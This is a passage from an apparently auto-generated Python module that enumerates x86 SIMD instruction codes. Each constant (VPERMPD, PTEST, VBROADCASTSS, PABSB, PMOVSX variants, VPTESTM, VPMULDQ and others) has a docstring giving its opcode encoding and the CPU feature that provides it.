``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 2684
"""
``VPERMPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 16 /r``
``AVX512F``
``16/32/64-bit``
"""
PTEST_XMM_XMMM128: int = 2685
"""
``PTEST xmm1, xmm2/m128``
``66 0F 38 17 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPTEST_XMM_XMMM128: int = 2686
"""
``VPTEST xmm1, xmm2/m128``
``VEX.128.66.0F38.WIG 17 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPTEST_YMM_YMMM256: int = 2687
"""
``VPTEST ymm1, ymm2/m256``
``VEX.256.66.0F38.WIG 17 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VBROADCASTSS_XMM_M32: int = 2688
"""
``VBROADCASTSS xmm1, m32``
``VEX.128.66.0F38.W0 18 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VBROADCASTSS_YMM_M32: int = 2689
"""
``VBROADCASTSS ymm1, m32``
``VEX.256.66.0F38.W0 18 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VBROADCASTSS_XMM_K1Z_XMMM32: int = 2690
"""
``VBROADCASTSS xmm1 {k1}{z}, xmm2/m32``
``EVEX.128.66.0F38.W0 18 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBROADCASTSS_YMM_K1Z_XMMM32: int = 2691
"""
``VBROADCASTSS ymm1 {k1}{z}, xmm2/m32``
``EVEX.256.66.0F38.W0 18 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBROADCASTSS_ZMM_K1Z_XMMM32: int = 2692
"""
``VBROADCASTSS zmm1 {k1}{z}, xmm2/m32``
``EVEX.512.66.0F38.W0 18 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VBROADCASTSD_YMM_M64: int = 2693
"""
``VBROADCASTSD ymm1, m64``
``VEX.256.66.0F38.W0 19 /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VBROADCASTF32X2_YMM_K1Z_XMMM64: int = 2694
"""
``VBROADCASTF32X2 ymm1 {k1}{z}, xmm2/m64``
``EVEX.256.66.0F38.W0 19 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTF32X2_ZMM_K1Z_XMMM64: int = 2695
"""
``VBROADCASTF32X2 zmm1 {k1}{z}, xmm2/m64``
``EVEX.512.66.0F38.W0 19 /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTSD_YMM_K1Z_XMMM64: int = 2696
"""
``VBROADCASTSD ymm1 {k1}{z}, xmm2/m64``
``EVEX.256.66.0F38.W1 19 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBROADCASTSD_ZMM_K1Z_XMMM64: int = 2697
"""
``VBROADCASTSD zmm1 {k1}{z}, xmm2/m64``
``EVEX.512.66.0F38.W1 19 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VBROADCASTF128_YMM_M128: int = 2698
"""
``VBROADCASTF128 ymm1, m128``
``VEX.256.66.0F38.W0 1A /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VBROADCASTF32X4_YMM_K1Z_M128: int = 2699
"""
``VBROADCASTF32X4 ymm1 {k1}{z}, m128``
``EVEX.256.66.0F38.W0 1A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VBROADCASTF32X4_ZMM_K1Z_M128: int = 2700
"""
``VBROADCASTF32X4 zmm1 {k1}{z}, m128``
``EVEX.512.66.0F38.W0 1A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VBROADCASTF64X2_YMM_K1Z_M128: int = 2701
"""
``VBROADCASTF64X2 ymm1 {k1}{z}, m128``
``EVEX.256.66.0F38.W1 1A /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTF64X2_ZMM_K1Z_M128: int = 2702
"""
``VBROADCASTF64X2 zmm1 {k1}{z}, m128``
``EVEX.512.66.0F38.W1 1A /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTF32X8_ZMM_K1Z_M256: int = 2703
"""
``VBROADCASTF32X8 zmm1 {k1}{z}, m256``
``EVEX.512.66.0F38.W0 1B /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VBROADCASTF64X4_ZMM_K1Z_M256: int = 2704
"""
``VBROADCASTF64X4 zmm1 {k1}{z}, m256``
``EVEX.512.66.0F38.W1 1B /r``
``AVX512F``
``16/32/64-bit``
"""
PABSB_MM_MMM64: int = 2705
"""
``PABSB mm1, mm2/m64``
``NP 0F 38 1C /r``
``SSSE3``
``16/32/64-bit``
"""
PABSB_XMM_XMMM128: int = 2706
"""
``PABSB xmm1, xmm2/m128``
``66 0F 38 1C /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPABSB_XMM_XMMM128: int = 2707
"""
``VPABSB xmm1, xmm2/m128``
``VEX.128.66.0F38.WIG 1C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPABSB_YMM_YMMM256: int = 2708
"""
``VPABSB ymm1, ymm2/m256``
``VEX.256.66.0F38.WIG 1C /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPABSB_XMM_K1Z_XMMM128: int = 2709
"""
``VPABSB xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.WIG 1C /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPABSB_YMM_K1Z_YMMM256: int = 2710
"""
``VPABSB ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.WIG 1C /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPABSB_ZMM_K1Z_ZMMM512: int = 2711
"""
``VPABSB zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.WIG 1C /r``
``AVX512BW``
``16/32/64-bit``
"""
PABSW_MM_MMM64: int = 2712
"""
``PABSW mm1, mm2/m64``
``NP 0F 38 1D /r``
``SSSE3``
``16/32/64-bit``
"""
PABSW_XMM_XMMM128: int = 2713
"""
``PABSW xmm1, xmm2/m128``
``66 0F 38 1D /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPABSW_XMM_XMMM128: int = 2714
"""
``VPABSW xmm1, xmm2/m128``
``VEX.128.66.0F38.WIG 1D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPABSW_YMM_YMMM256: int = 2715
"""
``VPABSW ymm1, ymm2/m256``
``VEX.256.66.0F38.WIG 1D /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPABSW_XMM_K1Z_XMMM128: int = 2716
"""
``VPABSW xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F38.WIG 1D /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPABSW_YMM_K1Z_YMMM256: int = 2717
"""
``VPABSW ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F38.WIG 1D /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPABSW_ZMM_K1Z_ZMMM512: int = 2718
"""
``VPABSW zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F38.WIG 1D /r``
``AVX512BW``
``16/32/64-bit``
"""
PABSD_MM_MMM64: int = 2719
"""
``PABSD mm1, mm2/m64``
``NP 0F 38 1E /r``
``SSSE3``
``16/32/64-bit``
"""
PABSD_XMM_XMMM128: int = 2720
"""
``PABSD xmm1, xmm2/m128``
``66 0F 38 1E /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPABSD_XMM_XMMM128: int = 2721
"""
``VPABSD xmm1, xmm2/m128``
``VEX.128.66.0F38.WIG 1E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPABSD_YMM_YMMM256: int = 2722
"""
``VPABSD ymm1, ymm2/m256``
``VEX.256.66.0F38.WIG 1E /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPABSD_XMM_K1Z_XMMM128B32: int = 2723
"""
``VPABSD xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.66.0F38.W0 1E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPABSD_YMM_K1Z_YMMM256B32: int = 2724
"""
``VPABSD ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.0F38.W0 1E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPABSD_ZMM_K1Z_ZMMM512B32: int = 2725
"""
``VPABSD zmm1 {k1}{z}, zmm2/m512/m32bcst``
``EVEX.512.66.0F38.W0 1E /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPABSQ_XMM_K1Z_XMMM128B64: int = 2726
"""
``VPABSQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F38.W1 1F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPABSQ_YMM_K1Z_YMMM256B64: int = 2727
"""
``VPABSQ ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F38.W1 1F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPABSQ_ZMM_K1Z_ZMMM512B64: int = 2728
"""
``VPABSQ zmm1 {k1}{z}, zmm2/m512/m64bcst``
``EVEX.512.66.0F38.W1 1F /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVSXBW_XMM_XMMM64: int = 2729
"""
``PMOVSXBW xmm1, xmm2/m64``
``66 0F 38 20 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVSXBW_XMM_XMMM64: int = 2730
"""
``VPMOVSXBW xmm1, xmm2/m64``
``VEX.128.66.0F38.WIG 20 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVSXBW_YMM_XMMM128: int = 2731
"""
``VPMOVSXBW ymm1, xmm2/m128``
``VEX.256.66.0F38.WIG 20 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVSXBW_XMM_K1Z_XMMM64: int = 2732
"""
``VPMOVSXBW xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.WIG 20 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVSXBW_YMM_K1Z_XMMM128: int = 2733
"""
``VPMOVSXBW ymm1 {k1}{z}, xmm2/m128``
``EVEX.256.66.0F38.WIG 20 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVSXBW_ZMM_K1Z_YMMM256: int = 2734
"""
``VPMOVSXBW zmm1 {k1}{z}, ymm2/m256``
``EVEX.512.66.0F38.WIG 20 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVSWB_XMMM64_K1Z_XMM: int = 2735
"""
``VPMOVSWB xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 20 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVSWB_XMMM128_K1Z_YMM: int = 2736
"""
``VPMOVSWB xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 20 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVSWB_YMMM256_K1Z_ZMM: int = 2737
"""
``VPMOVSWB ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 20 /r``
``AVX512BW``
``16/32/64-bit``
"""
PMOVSXBD_XMM_XMMM32: int = 2738
"""
``PMOVSXBD xmm1, xmm2/m32``
``66 0F 38 21 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVSXBD_XMM_XMMM32: int = 2739
"""
``VPMOVSXBD xmm1, xmm2/m32``
``VEX.128.66.0F38.WIG 21 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVSXBD_YMM_XMMM64: int = 2740
"""
``VPMOVSXBD ymm1, xmm2/m64``
``VEX.256.66.0F38.WIG 21 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVSXBD_XMM_K1Z_XMMM32: int = 2741
"""
``VPMOVSXBD xmm1 {k1}{z}, xmm2/m32``
``EVEX.128.66.0F38.WIG 21 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXBD_YMM_K1Z_XMMM64: int = 2742
"""
``VPMOVSXBD ymm1 {k1}{z}, xmm2/m64``
``EVEX.256.66.0F38.WIG 21 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXBD_ZMM_K1Z_XMMM128: int = 2743
"""
``VPMOVSXBD zmm1 {k1}{z}, xmm2/m128``
``EVEX.512.66.0F38.WIG 21 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSDB_XMMM32_K1Z_XMM: int = 2744
"""
``VPMOVSDB xmm1/m32 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 21 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSDB_XMMM64_K1Z_YMM: int = 2745
"""
``VPMOVSDB xmm1/m64 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 21 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSDB_XMMM128_K1Z_ZMM: int = 2746
"""
``VPMOVSDB xmm1/m128 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 21 /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVSXBQ_XMM_XMMM16: int = 2747
"""
``PMOVSXBQ xmm1, xmm2/m16``
``66 0F 38 22 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVSXBQ_XMM_XMMM16: int = 2748
"""
``VPMOVSXBQ xmm1, xmm2/m16``
``VEX.128.66.0F38.WIG 22 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVSXBQ_YMM_XMMM32: int = 2749
"""
``VPMOVSXBQ ymm1, xmm2/m32``
``VEX.256.66.0F38.WIG 22 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVSXBQ_XMM_K1Z_XMMM16: int = 2750
"""
``VPMOVSXBQ xmm1 {k1}{z}, xmm2/m16``
``EVEX.128.66.0F38.WIG 22 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXBQ_YMM_K1Z_XMMM32: int = 2751
"""
``VPMOVSXBQ ymm1 {k1}{z}, xmm2/m32``
``EVEX.256.66.0F38.WIG 22 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXBQ_ZMM_K1Z_XMMM64: int = 2752
"""
``VPMOVSXBQ zmm1 {k1}{z}, xmm2/m64``
``EVEX.512.66.0F38.WIG 22 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQB_XMMM16_K1Z_XMM: int = 2753
"""
``VPMOVSQB xmm1/m16 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 22 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQB_XMMM32_K1Z_YMM: int = 2754
"""
``VPMOVSQB xmm1/m32 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 22 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQB_XMMM64_K1Z_ZMM: int = 2755
"""
``VPMOVSQB xmm1/m64 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 22 /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVSXWD_XMM_XMMM64: int = 2756
"""
``PMOVSXWD xmm1, xmm2/m64``
``66 0F 38 23 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVSXWD_XMM_XMMM64: int = 2757
"""
``VPMOVSXWD xmm1, xmm2/m64``
``VEX.128.66.0F38.WIG 23 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVSXWD_YMM_XMMM128: int = 2758
"""
``VPMOVSXWD ymm1, xmm2/m128``
``VEX.256.66.0F38.WIG 23 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVSXWD_XMM_K1Z_XMMM64: int = 2759
"""
``VPMOVSXWD xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.WIG 23 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXWD_YMM_K1Z_XMMM128: int = 2760
"""
``VPMOVSXWD ymm1 {k1}{z}, xmm2/m128``
``EVEX.256.66.0F38.WIG 23 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXWD_ZMM_K1Z_YMMM256: int = 2761
"""
``VPMOVSXWD zmm1 {k1}{z}, ymm2/m256``
``EVEX.512.66.0F38.WIG 23 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSDW_XMMM64_K1Z_XMM: int = 2762
"""
``VPMOVSDW xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 23 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSDW_XMMM128_K1Z_YMM: int = 2763
"""
``VPMOVSDW xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 23 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSDW_YMMM256_K1Z_ZMM: int = 2764
"""
``VPMOVSDW ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 23 /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVSXWQ_XMM_XMMM32: int = 2765
"""
``PMOVSXWQ xmm1, xmm2/m32``
``66 0F 38 24 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVSXWQ_XMM_XMMM32: int = 2766
"""
``VPMOVSXWQ xmm1, xmm2/m32``
``VEX.128.66.0F38.WIG 24 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVSXWQ_YMM_XMMM64: int = 2767
"""
``VPMOVSXWQ ymm1, xmm2/m64``
``VEX.256.66.0F38.WIG 24 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVSXWQ_XMM_K1Z_XMMM32: int = 2768
"""
``VPMOVSXWQ xmm1 {k1}{z}, xmm2/m32``
``EVEX.128.66.0F38.WIG 24 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXWQ_YMM_K1Z_XMMM64: int = 2769
"""
``VPMOVSXWQ ymm1 {k1}{z}, xmm2/m64``
``EVEX.256.66.0F38.WIG 24 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXWQ_ZMM_K1Z_XMMM128: int = 2770
"""
``VPMOVSXWQ zmm1 {k1}{z}, xmm2/m128``
``EVEX.512.66.0F38.WIG 24 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQW_XMMM32_K1Z_XMM: int = 2771
"""
``VPMOVSQW xmm1/m32 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 24 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQW_XMMM64_K1Z_YMM: int = 2772
"""
``VPMOVSQW xmm1/m64 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 24 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQW_XMMM128_K1Z_ZMM: int = 2773
"""
``VPMOVSQW xmm1/m128 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 24 /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVSXDQ_XMM_XMMM64: int = 2774
"""
``PMOVSXDQ xmm1, xmm2/m64``
``66 0F 38 25 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVSXDQ_XMM_XMMM64: int = 2775
"""
``VPMOVSXDQ xmm1, xmm2/m64``
``VEX.128.66.0F38.WIG 25 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVSXDQ_YMM_XMMM128: int = 2776
"""
``VPMOVSXDQ ymm1, xmm2/m128``
``VEX.256.66.0F38.WIG 25 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVSXDQ_XMM_K1Z_XMMM64: int = 2777
"""
``VPMOVSXDQ xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.W0 25 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXDQ_YMM_K1Z_XMMM128: int = 2778
"""
``VPMOVSXDQ ymm1 {k1}{z}, xmm2/m128``
``EVEX.256.66.0F38.W0 25 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXDQ_ZMM_K1Z_YMMM256: int = 2779
"""
``VPMOVSXDQ zmm1 {k1}{z}, ymm2/m256``
``EVEX.512.66.0F38.W0 25 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQD_XMMM64_K1Z_XMM: int = 2780
"""
``VPMOVSQD xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 25 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQD_XMMM128_K1Z_YMM: int = 2781
"""
``VPMOVSQD xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 25 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQD_YMMM256_K1Z_ZMM: int = 2782
"""
``VPMOVSQD ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 25 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTMB_KR_K1_XMM_XMMM128: int = 2783
"""
``VPTESTMB k2 {k1}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W0 26 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTMB_KR_K1_YMM_YMMM256: int = 2784
"""
``VPTESTMB k2 {k1}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W0 26 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTMB_KR_K1_ZMM_ZMMM512: int = 2785
"""
``VPTESTMB k2 {k1}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W0 26 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTMW_KR_K1_XMM_XMMM128: int = 2786
"""
``VPTESTMW k2 {k1}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 26 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTMW_KR_K1_YMM_YMMM256: int = 2787
"""
``VPTESTMW k2 {k1}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 26 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTMW_KR_K1_ZMM_ZMMM512: int = 2788
"""
``VPTESTMW k2 {k1}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 26 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTNMB_KR_K1_XMM_XMMM128: int = 2789
"""
``VPTESTNMB k2 {k1}, xmm2, xmm3/m128``
``EVEX.128.F3.0F38.W0 26 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTNMB_KR_K1_YMM_YMMM256: int = 2790
"""
``VPTESTNMB k2 {k1}, ymm2, ymm3/m256``
``EVEX.256.F3.0F38.W0 26 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTNMB_KR_K1_ZMM_ZMMM512: int = 2791
"""
``VPTESTNMB k2 {k1}, zmm2, zmm3/m512``
``EVEX.512.F3.0F38.W0 26 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTNMW_KR_K1_XMM_XMMM128: int = 2792
"""
``VPTESTNMW k2 {k1}, xmm2, xmm3/m128``
``EVEX.128.F3.0F38.W1 26 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTNMW_KR_K1_YMM_YMMM256: int = 2793
"""
``VPTESTNMW k2 {k1}, ymm2, ymm3/m256``
``EVEX.256.F3.0F38.W1 26 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTNMW_KR_K1_ZMM_ZMMM512: int = 2794
"""
``VPTESTNMW k2 {k1}, zmm2, zmm3/m512``
``EVEX.512.F3.0F38.W1 26 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTMD_KR_K1_XMM_XMMM128B32: int = 2795
"""
``VPTESTMD k2 {k1}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 27 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTMD_KR_K1_YMM_YMMM256B32: int = 2796
"""
``VPTESTMD k2 {k1}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 27 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTMD_KR_K1_ZMM_ZMMM512B32: int = 2797
"""
``VPTESTMD k2 {k1}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 27 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTMQ_KR_K1_XMM_XMMM128B64: int = 2798
"""
``VPTESTMQ k2 {k1}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 27 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTMQ_KR_K1_YMM_YMMM256B64: int = 2799
"""
``VPTESTMQ k2 {k1}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 27 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTMQ_KR_K1_ZMM_ZMMM512B64: int = 2800
"""
``VPTESTMQ k2 {k1}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 27 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTNMD_KR_K1_XMM_XMMM128B32: int = 2801
"""
``VPTESTNMD k2 {k1}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.F3.0F38.W0 27 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTNMD_KR_K1_YMM_YMMM256B32: int = 2802
"""
``VPTESTNMD k2 {k1}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.F3.0F38.W0 27 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTNMD_KR_K1_ZMM_ZMMM512B32: int = 2803
"""
``VPTESTNMD k2 {k1}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.F3.0F38.W0 27 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTNMQ_KR_K1_XMM_XMMM128B64: int = 2804
"""
``VPTESTNMQ k2 {k1}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.F3.0F38.W1 27 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTNMQ_KR_K1_YMM_YMMM256B64: int = 2805
"""
``VPTESTNMQ k2 {k1}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.F3.0F38.W1 27 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTNMQ_KR_K1_ZMM_ZMMM512B64: int = 2806
"""
``VPTESTNMQ k2 {k1}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.F3.0F38.W1 27 /r``
``AVX512F``
``16/32/64-bit``
"""
PMULDQ_XMM_XMMM128: int = 2807
"""
``PMULDQ xmm1, xmm2/m128``
``66 0F 38 28 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMULDQ_XMM_XMM_XMMM128: int = 2808
"""
``VPMULDQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 28 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMULDQ_YMM_YMM_YMMM256: int = 2809
"""
``VPMULDQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 28 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMULDQ_XMM_K1Z_XMM_XMMM128B64: int = 2810
"""
``VPMULDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 28 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMULDQ_YMM_K1Z_YMM_YMMM256B64: int = 2811
"""
``VPMULDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 28 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMULDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2812
"""
``VPMULDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 28 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVM2B_XMM_KR: int = 2813
"""
``VPMOVM2B xmm1, k1``
``EVEX.128.F3.0F38.W0 28 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVM2B_YMM_KR: int = 2814
"""
``VPMOVM2B ymm1, k1``
``EVEX.256.F3.0F38.W0 28 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVM2B_ZMM_KR: int = 2815
"""
``VPMOVM2B zmm1, k1``
``EVEX.512.F3.0F38.W0 28 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVM2W_XMM_KR: int = 2816
"""
``VPMOVM2W xmm1, k1``
``EVEX.128.F3.0F38.W1 28 /r``
